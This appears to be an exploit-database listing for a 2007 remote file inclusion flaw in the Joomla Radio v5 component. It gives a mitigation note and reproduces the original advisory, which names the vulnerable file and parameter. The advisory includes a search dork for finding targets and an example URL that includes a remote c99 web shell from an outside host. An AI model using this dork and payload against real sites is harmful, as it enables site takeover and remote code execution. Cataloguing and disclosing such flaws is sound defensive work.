header-logo
Suggest Exploit
vendor:
Joomla Radio
by:
Unknown
5.5
CVSS
MEDIUM
Remote File Inclusion
22
CWE
Product Name: Joomla Radio
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Radio v5 Component RFI

This exploit allows an attacker to include a remote file by manipulating the $mosConfig_live_site variable in the com_joomlaradiov5/admin.joomlaradiov5.php file. An example URL is provided in the text.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Joomla Radio component to a version that includes a patch for this issue. Alternatively, the affected file can be modified to properly sanitize user input before including remote files.
Source

Exploit-DB raw data:

###########################
# Joomla Radio v5 Component RFI           #
###########################

Bug in :
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php
Variable : $mosConfig_live_site

Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,fileinfo/id,2661.html

Dork: inurl:"com_joomlaradiov5"

Example:

www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-13]

Navigation

Suggest Exploit

Services By CQR